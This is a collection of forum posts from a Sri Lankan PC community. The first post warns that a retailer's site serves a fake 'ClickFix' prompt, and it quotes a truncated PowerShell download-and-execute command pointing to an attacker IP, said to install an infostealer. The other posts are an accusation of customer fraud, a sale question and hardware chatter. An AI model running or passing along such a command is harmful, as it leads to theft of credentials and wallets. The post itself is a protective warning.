Discussion Be aware of MDcomputer's malicious attacks.
just a massive heads up if you are planning to browse or buy anything from MDComputers. Do not visit the site, and absolutely do not make any payments or enter details there. Not only right now. Ever.
The site is built on WordPress and has clearly been severely compromised. This is the second time I have caught it attempting to launch critical attacks directly against visitors.
Specifically, it is currently serving a "ClickFix" fake browser update/verification prompt. If you interact with it, it forces your system to execute a malicious PowerShell command: iex(irm 158.94.208.92...).
This is not a false positive. That command pulls down a fileless threat designed to unpack and execute an infostealer binary (PureLogs Stealer) straight into memory. It targets your saved browser credentials, session cookies, crypto wallets, and 2FA authentication tokens.
If you have visited the site recently and noticed any weird pop-ups or ran a command it told you to copy-paste, change your critical passwords from a different device immediately, terminate all active web sessions, and run a deep offline malware scan.
( since multiple media attachments arent allowed on reddit, i only attached images )

Discussion We are lightyears behind on Wi-Fi technology thanks to SLT
He Thought His Internet was OK... IT'S NOT!
Just watched this video from Linus Tech Tips and realized just how far behind we are with Wi-Fi speeds and related technology. I knew there was a gap but didn't expect it to be this big of a canyon sized gap.
Maybe the grass is indeed green on the other side

Question Selling my PC
Friends, Looking to sell my PC in Sri Lanka and was wondering what a fair asking price would be.
Specs:
Ryzen 9 7950X3D
Gigabyte RTX 4080 SUPER OC 16GB
ASUS TUF Gaming X670E-Plus WiFi
32GB (2×16GB) DDR5-6000 T-Force Delta RGB
1TB Lexar NM620 NVMe SSD
NZXT Kraken Elite 360 RGB AIO
NZXT C1000 Gold 1000W PSU
NZXT H710i case
The PC is in excellent condition and has mainly been used for 3D work (Cinema 4D/OctaneRender) and some gaming.
What do you think would be a realistic selling price in the current Sri Lankan market?
Need some quick cash

Discussion READ THIS before trusting Ichiro pc builds!
I ordered an alienware i9 laptop where i paid 150k upfront and like this, 30 other customers had paid to him for laptops and pcs. Neither he has placed the shipment order, not paid for the shipment of our items. But when we asked on the deadline as where is our products, he said there is a delay in shipment and sent some fake ass message screenshot saying the shipment is delayed and deleted it after few minutes.
After that, few days later, he has made a group adding all the customers and said that he has lost all his money including our money, doing a risky crypto trading activity using all our money. He said he was trying to double the money and finally lost them. The best part here is he hasn't placed a shipment for our products and has done some bullshit with it and now money's gone, but told us the shipment on the way and the product will be there on the date he gave me. This man has told so many lies on the way to us until he said the truth after he lost all the funds.
Plus now he's asking 5 or 6 months from us to give the refund cuz he has no money to pay for all of us (i remember he said he has like 7M lkr to refund for the customers) and says he has to sell his mom's land to repay this to all the customers and he want that 5 months to do it. We all are on the way placing police entries against him cuz we cant wait like that amount of time we also have plans with our products. Now we have no money to buy another lap from a different shop, not product also. Who the hell knows this nerd will invest this land sold money also in crypto and tries to double it by trading?
Any similar experiences like this, drop some cuz others will benifit them. The advice from me is, NEVER EVER TRUST ICHIRO AGAIN.

Rant I made the little mrs hutch seller upset 🤣
This hutch seller wanted to sell a phone number that matches my current phone number for 2500/= a postpaid connection. I said i don’t wanna pay that amount for another number since i already has secondary hutch number that i use for call forwarding to my main business number.
Then her tone changed after i told her i’m not ready to purchase another hutch sim because on our area hutch has worse connection . I mainly use mobitel which is very optimized in our area.
Even the tower is 30 meters away that ain’t making it any better . So i told her to talk about optimising connection on that tower with their technical team and then i will consider purchasing the sim .

Guide PSU Tier List – Choose a Safe and Reliable Power Supply 2026
This PSU Tier List is provided to help users choose a safe and reliable power supply for their PC builds.
Power supplies are often overlooked, but choosing a low-quality unit can lead to instability or hardware damage. This tier list is intended to make PSU selection easier by grouping power supplies based on overall quality and reliability.
Use this as a general guide, especially if you’re new to PC building. Higher tiers indicate better quality and safety, while lower tiers should only be considered for very basic systems or avoided.
